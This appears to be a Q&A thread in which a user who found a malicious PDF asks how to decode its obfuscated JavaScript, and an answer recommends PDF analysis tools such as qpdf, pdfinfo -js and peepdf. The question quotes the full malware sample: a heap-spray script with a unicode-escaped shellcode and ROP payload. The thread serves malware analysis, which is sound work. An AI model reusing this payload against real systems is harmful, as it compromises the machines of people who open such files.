I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point.
I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before.
Code example: This is what the majority of the code looks like
var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')
I imagine that this notation with long variable/function names and hidden text characters is to confuse scanners that look for these type of things.
Two questions:
Question 1
Can someone tell me what this is called with the %u4141
?
Question 2
Is there some tool that will translate that notation into plaintext so I can see what it is doing?
Full JS code:
var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');
var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");
while (C.length + 20 + 8 < 65536) C+=C;
D = C.substring(0, (0x0c0c-0x24)/2);
D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";
It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing of this JavaScript.
Since this topic (obfuscating and hiding malicious JavaScript code in harmlessly looking PDF files) seems to becoming more and more popular with malware authors, let me list some tools and websites which proofed to be helpful to anyone who's a beginner in dissecting this type of threats:
qpdf --qdf original.pdf unpacked.pdf
I don't know how exactly you extracted the Javascript snippet you provided in your question. But, by all means, don't rely on having found all of the JS code inside the PDF -- unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tipps in No. 6... The other tools may need some more studying of PDF syntax before you can really make them useful to you.)
Here is an update to my (almost 3 years) old answer. It's worth while to add:
pdfinfo -js
: the most recent (Poppler-based!, not XPDF-based) versions of pdfinfo
(starting with v0.25.0, released Dec 11, 2013) now know the -js
command line parameter which prints out the JavaScript code embedded in a PDF file.
This works even for many cases were the /JavaScript
name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as /4Aavascript
or /J#61v#61script
or similar.
Unfortunately, this marvelous feature addition to pdfinfo
is still known much too little. Please share!
Another update, because the above mentioned peepdf
tool recently got the extract
sub-command added:
peepdf.js
: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but is also very good for general exploration of PDF file structures.
Installation and usage:
git clone https://github.com/jesparza/peepdf git.peepdf
.peepdf.py
script and put it somewhere into your $PATH
:cd git.clone ;
ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
peepdf.py -fil my.pdf
Use the extract js > all-js-in-my.pdf
command to extract and redirect all JavaScript contained in my.pdf
into a file. This is depicted by the screenshots below: